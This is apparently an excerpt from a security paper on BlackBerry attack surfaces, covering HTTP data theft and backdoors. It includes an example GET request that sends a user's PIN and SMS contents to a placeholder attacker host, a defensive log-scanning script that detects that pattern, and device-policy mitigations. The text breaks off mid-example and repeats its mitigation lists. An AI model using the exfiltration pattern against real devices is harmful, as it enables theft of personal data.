Table Of Contents
- Introduction
- Architecture Overview
- Operating System
- Code Signing
- Modifying Signed Applications
- Malicious Code Signing
- Mitigation Strategies
- BIS Deployment
- Application Permissions
- Device Firewall
- BES Deployment
- IT Policy
- Application Control Policy
- Application Permissions
- Device Firewall
- Attack Surface Analysis
- Introduction
- JAD Files
- Mitigation
- File System
- Persistent Storage
- J2ME File System
- USB Mass Storage
- Mitigation
- Memory and Processes
- Auto start-up and Background processes
- SMS (Short Message Service)
- Premium Rate Scam
- SMS Interception
- SMS Backdoor
- Mitigation
- Bluetooth
- Bluetooth Backdoor
- Bluetooth Worms
- Mitigation
- Email
- Email Interception
- Backdoor
- Worm
- Mitigation
- PIM Data (Personal Information Manager Data)
- Data Theft
- Loss of data availability and integrity
- Mitigation
- TCP/IP Connections
- Proxy/Firewall Bypass
- Backdoor
- Port Scan
- Mitigation
- Port Scan
- HTTP / WAP
- Data Theft
- Backdoor
- HTTP Proxy
- Mitigation
- Telephony
- Call Record Monitoring
- Premium Rate Calls
- Bypassing Caller Verification Systems
- Telephony Data Theft
- Mitigation
- Camera
- Mitigation
- Conclusions
- Appendix A
- References

Attack Surface Analysis of BlackBerry Devices
Proxy/Firewall Bypass
Backdoor
Port Scan
HTTP / WAP
The BlackBerry supports HTTP and WAP connections via the J2ME API javax.microedition.io.[5] Unsigned and signed applications can open a new HTTP connection, and send and receive data using OutputStream and InputStream objects.
Data Theft
A user installs some apparently useful application or video game. The application steals the user's information and passes it to the attacker via an HTTP GET request, e.g.:
http://www.badsite.com/upload?&PIN=9012345678&SMS=1&FROM=0865550456&MSG=This+is+top+secret+data
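A defender-side check for the pattern above, as an added example that is not part of the original paper: it scans web proxy log lines for GET requests that carry device or phone identifiers in the query string to hosts outside an allowlist. The log format, the allowlist contents, the scoring threshold and all function names are assumptions; the sample log is constructed, with the paper's example URL as one entry.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: hosts the organisation permits handheld applications to reach.
ALLOWED_HOSTS = {"intranet.example.com", "maps.example.net"}
# Parameter names taken from the example URL above; extend for local use.
SUSPECT_KEYS = {"pin", "sms", "from", "msg"}
# Values that look like a phone number or a numeric device identifier.
NUMERIC_ID = re.compile(r"^\+?\d{8,15}$")

# Constructed sample proxy log, one request per line: "<client> <method> <url>".
SAMPLE_LOG = """\
10.0.0.21 GET http://intranet.example.com/news?page=2
10.0.0.37 GET http://www.badsite.com/upload?&PIN=9012345678&SMS=1&FROM=0865550456&MSG=This+is+top+secret+data
10.0.0.37 GET http://maps.example.net/tile?x=10&y=12
10.0.0.44 GET http://cdn.example.org/app?id=20001234567&v=3
"""

def score_request(url):
    """Return (score, reasons) for one requested URL; one point per reason."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host not in ALLOWED_HOSTS:
        reasons.append("host not in allowlist")
    # parse_qsl skips the empty field produced by the leading "&".
    params = parse_qsl(parts.query, keep_blank_values=True)
    keys = {k.lower() for k, _ in params} & SUSPECT_KEYS
    if keys:
        reasons.append("suspect parameters: " + ",".join(sorted(keys)))
    ids = [k for k, v in params if NUMERIC_ID.match(v)]
    if ids:
        reasons.append("numeric identifiers in: " + ",".join(ids))
    return len(reasons), reasons

def scan(log_text, threshold=2):
    """Return (client, url, reasons) for GET lines scoring >= threshold."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(None, 2)
        if len(fields) != 3 or fields[1] != "GET":
            continue
        client, _, url = fields
        score, reasons = score_request(url)
        if score >= threshold:
            hits.append((client, url, reasons))
    return hits

if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(client, urlsplit(url).hostname, "; ".join(reasons))
```

The last sample line shows why value patterns are checked as well as parameter names: a renamed parameter still carries an identifier-shaped value to a host outside the allowlist.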
Backdoor
HTTP can also be used as a command and control channel. A malicious application can make an outbound
HTTP connection to retrieve commands from a remote Web site and send back data. E.g.:
- IT Policy:
  - "Allow External Connections" = False
  - "Allow Internal Connections" = False
- Application Controls:
  - "External Domains" = [list of allowed domains]
  or
  - "External Network Connections" = Not Permitted
  - "Internal Network Connections" = Not Permitted
- Device Firewall: Status = Enabled
- Application Permissions: Connections > Carrier Internet = Deny
- Other Device Settings:

- IT Policy:
  - "Allow External Connections" = False
  - "Allow Internal Connections" = False
- Application Controls:
  - "External Network Connections" = Not Permitted
  - "Internal Network Connections" = Not Permitted
- Device Firewall: Status = Enabled
- Application Permissions: Connections > Carrier Internet = Deny
- Other Device Settings:










